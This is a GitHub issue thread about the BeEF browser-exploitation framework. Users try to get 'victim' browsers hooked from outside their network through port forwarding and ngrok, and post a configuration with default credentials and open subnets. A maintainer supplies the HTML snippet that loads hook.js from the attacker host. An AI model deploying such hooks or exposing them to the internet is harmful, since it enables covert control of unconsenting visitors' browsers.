beef hook working on local machine, but not on external machines

[avatar6712]

Verify first that your issue/request has not been posted previously:

• https://github.com/beefproject/beef/issues
• https://github.com/beefproject/beef/wiki/FAQ

Ensure you're using the latest version of BeEF.

Environment

What version/revision of BeEF are you using? 0.4.7.0

On what version of Ruby? 2.5.1p57

On what browser? Firefox ERS

On what operating system? Kali Linux

Configuration

#

Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net

Browser Exploitation Framework (BeEF) - http://beefproject.com

See the file 'doc/COPYING' for copying permission

#

BeEF Configuration file

beef: version: '0.4.7.0-alpha'

More verbose messages (server-side)

debug: false
# More verbose messages (client-side)
client_debug: false
# Used for generating secure tokens
crypto_default_value_length: 80

# Interface / IP restrictions
restrictions:
    # subnet of IP addresses that can hook to the framework
    permitted_hooking_subnet: "0.0.0.0/0"
    # subnet of IP addresses that can connect to the admin UI
    #permitted_ui_subnet: "127.0.0.1/32"
    permitted_ui_subnet: "0.0.0.0/0"

# HTTP server
http:
    debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
    host: "0.0.0.0"
    port: "3000"

    # Decrease this setting to 1,000 (ms) if you want more responsiveness
    #  when sending modules and retrieving results.
    # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
    #  when hooking lots of browsers (50+).
    # Enabling WebSockets is generally better (beef.websocket.enable)
    xhr_poll_timeout: 1000

    # Reverse Proxy / NAT
    # If BeEF is running behind a reverse proxy or NAT
    #  set the public hostname and port here
    #public: "aczero.company.com"      # public hostname/IP address
    #public_port: "3000" # experimental

    # DNS
    dns_host: "192.168.0.45"
    dns_port: 53

    # Web Admin user interface URI
    web_ui_basepath: "/ui"

    # Hook
    hook_file: "/hook.js"
    hook_session_name: "BEEFHOOK"
    session_cookie_name: "BEEFSESSION"

    # Allow one or multiple origins to access the RESTful API using CORS
    # For multiple origins use: "http://browserhacker.com, http://domain2.com"
    restful_api:
        allow_cors: false
        cors_allowed_domains: "http://browserhacker.com"

    # Prefer WebSockets over XHR-polling when possible.
    websocket:
        enable: false
        port: 61985 # WS: good success rate through proxies
        # Use encrypted 'WebSocketSecure'
        # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
        secure: true
        secure_port: 61986 # WSSecure
        ws_poll_timeout: 1000 # poll BeEF every second

    # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
    web_server_imitation:
        enable: true
        type: "apache" # Supported: apache, iis, nginx
        hook_404: false # inject BeEF hook in HTTP 404 responses
        hook_root: false # inject BeEF hook in the server home page
    # Experimental HTTPS support for the hook / admin / all other Thin managed web services
    https:
        enable: false
        # In production environments, be sure to use a valid certificate signed for the value
        # used in beef.http.dns_host (the domain name of the server where you run BeEF)
        key: "beef_key.pem"
        cert: "beef_cert.pem"

database:
    # For information on using other databases please read the
    # README.databases file

    # supported DBs: sqlite, mysql, postgres
    # NOTE: you must change the Gemfile adding a gem require line like:
    #   gem "dm-postgres-adapter"
    # or
    #   gem "dm-mysql-adapter"
    # if you want to switch drivers from sqlite to postgres (or mysql).
    # Finally, run a 'bundle install' command and start BeEF.
    driver: "sqlite"

    # db_file is only used for sqlite
    db_file: "db/beef.db"

    # db connection information is only used for mysql/postgres
    db_host: "192.168.0.45"
    db_port: 3306
    db_name: "beef"
    db_user: "beef"
    db_passwd: "beef"
    db_encoding: "UTF-8"

# Credentials to authenticate in BeEF.
# Used by both the RESTful API and the Admin_UI extension
credentials:
    user:   "beef"
    passwd: "beef"

# Autorun Rule Engine
autorun:
    # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
    # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
    # continue execution regardless of results.
    # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
    result_poll_interval: 300
    result_poll_timeout: 5000

    # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
    # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
    continue_after_timeout: true

# Enables DNS lookups on zombie IP addresses
dns_hostname_lookup: false

# IP Geolocation
# NOTE: requires MaxMind database:
#   curl -O http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
#   gunzip GeoLiteCity.dat.gz && mkdir /opt/GeoIP && mv GeoLiteCity.dat /opt/GeoIP
geoip:
    enable: false
    database: '/opt/GeoIP/GeoLiteCity.dat'

# Integration with PhishingFrenzy
# If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
# to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
integration:
    phishing_frenzy:
        enable: false

# You may override default extension configuration parameters here
extension:
    requester:
        enable: true
    proxy:
        enable: true
        key: "beef_key.pem"
        cert: "beef_cert.pem"
    metasploit:
        enable: true
    social_engineering:
        enable: true
    evasion:
        enable: false
    console:
         shell:
            enable: false
    ipec:
        enable: true
    # this is still experimental..
    # Disable it in kali because it doesn't work with the current
    # version of ruby-rubydns (older version is required by beef-xss)
    dns:
        enable: false
    # this is still experimental..
    dns_rebinding:
        enable: false

Are you using a non-default configuration? public: "aczero.company.com" public port:"3000" Have you enabled or disabled any BeEF extensions? No.

Summary

Please provide a summary of the issue. The hook on my website will only work on my local machine, but not remotely on external devices. I have already enabled public ip/hostname

Expected Behaviour

What was the expected result? the victim browser would be hooked upon visiting aczero.company.com and appear in online browsers.

Actual Behaviour

What was the actual result? victim browser was not hooked

Steps to Reproduce

Please provide steps to reproduce this issue.

Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screenshots.

[TheUndeadPriest]

Same is happening with me. I uploaded the index.html to a website hosting site (000webhost.com) and the html contents are being displayed, but the browsers other than the host machines aren't visible :(

[bcoles]

@TheUndeadPriest

I uploaded the index.html to a website

Which HTML file?

[TheUndeadPriest]

The file with the hook, index.html.

Thanks for replying bruv, I figured out I wasn't Port forwarded for it to work on WAN, but I port forwarded port 80 and still no use :(

[bcoles]

Do you mean the demo index.html file? That isn't going to work.

If you want to host the script elsewhere, you need to use the BeEF script:

<html>
<script src="http://beef.local.ip.address.here:3000/hook.js"></script>
</html>

[bcoles]

@TheUndeadPriest check here for info on configuring for port forwarding : https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat

[TheUndeadPriest]

I hosted the file with a script in it, and the html file is made by me in the var/www/html folder.

Anyways thanks for replying and I will look into the port forwarding thread, is there anyway I can contact you because most of the time in most pentesting groups I don't get a reply at all :( I promise I won't bother you much

[bcoles]

@TheUndeadPriest the #beefproject channel on Freenode IRC is probably best, but if you can find my twitter or email you're welcome to try contacting me there.

[TheUndeadPriest]

Thanks a ton bruv ♥️

[TheUndeadPriest]

@bcoles

Bruv I decided to edit the .yml file of ngrok and add multiple tunnel for port 80 and 3000 but it shows :

Failed to save authtoken to configuration file '/root/.ngrok2/ngrok.yml': yaml: line 5: found character that cannot start any token

Why is it so?

[bcoles]

@TheUndeadPriest you didn't mention you were using ngrok.

A few other users have used ngrok and managed to get it working. You might find some useful information in one of the issues:

• https://github.com/beefproject/beef/issues?utf8=%E2%9C%93&q=is%3Aissue+ngrok+

As for your error yaml: line 5: found character that cannot start any token - you have malformed YAML. At a guess, you probably tried to specify a string without wrapping it in quotes, or your indentation is messed up.

[TheUndeadPriest]

@bcoles

So I edited the .yml file like this-

tunnels: first-app: addr: 80 proto: http second-app: addr: 3000 proto: http

Now I need to put "80" "3000" and "http" in quotes like this? Or the entire code? I am kinda noob at this so please have patience /'\

[bcoles]

@TheUndeadPriest I have no idea. I don't use ngrok and this isn't an issue with BeEF.

The error received says line 5 is the issue. At a guess, it's because of the - in second-app.

You should read the ngrok documentation. Additionally, your indentation is messed up.

tunnels:
  first_app:
    addr: 80
    proto: http
  second_app:
    addr: 3000
    proto: http

[bcoles]

1619

[ko3nd3drumm3r]

this video explains it all https://www.youtube.com/watch?v=6Jr0i2GKKhA

[aditya324jhj]

@ko3nd3drumm3r please make the video public so that I can see it. Thank you ~Aditya

[methodhenry]

the execute button is missing.

[swifty29320]

Do you mean the demo index.html file? That isn't going to work.

If you want to host the script elsewhere, you need to use the BeEF script:

<html>
<script src="http://beef.local.ip.address.here:3000/hook.js"></script>
</html>

for some reason my index.html is on read only and I can't edit it some1 please help

[bcoles]

for some reason my index.html is on read only and I can't edit it some1 please help

It may be owned by a different user. Change the file permissions or edit the file using sudo/root.

[swifty29320]

yeah thats what i need how do i change the file permissions?

On Thu, Jun 15, 2023 at 1:52 PM bcoles @.***> wrote:

for some reason my index.html is on read only and I can't edit it some1 please help

It may be owned by a different user. Change the file permissions or edit the file using sudo/root.

— Reply to this email directly, view it on GitHub https://github.com/beefproject/beef/issues/1589#issuecomment-1592219482, or unsubscribe https://github.com/notifications/unsubscribe-auth/BAQSORD6F5X2BVEXBQXDST3XLJTHDANCNFSM4FKBXS7Q . You are receiving this because you commented.Message ID: @.***>

[swifty29320]

also do u have discord i was wondering if we could call and i screen share and u help me out?

On Fri, Jun 16, 2023 at 11:57 AM Swiftyon dararo @.***> wrote:

yeah thats what i need how do i change the file permissions?

On Thu, Jun 15, 2023 at 1:52 PM bcoles @.***> wrote:

for some reason my index.html is on read only and I can't edit it some1 please help

It may be owned by a different user. Change the file permissions or edit the file using sudo/root.

— Reply to this email directly, view it on GitHub https://github.com/beefproject/beef/issues/1589#issuecomment-1592219482, or unsubscribe https://github.com/notifications/unsubscribe-auth/BAQSORD6F5X2BVEXBQXDST3XLJTHDANCNFSM4FKBXS7Q . You are receiving this because you commented.Message ID: @.***>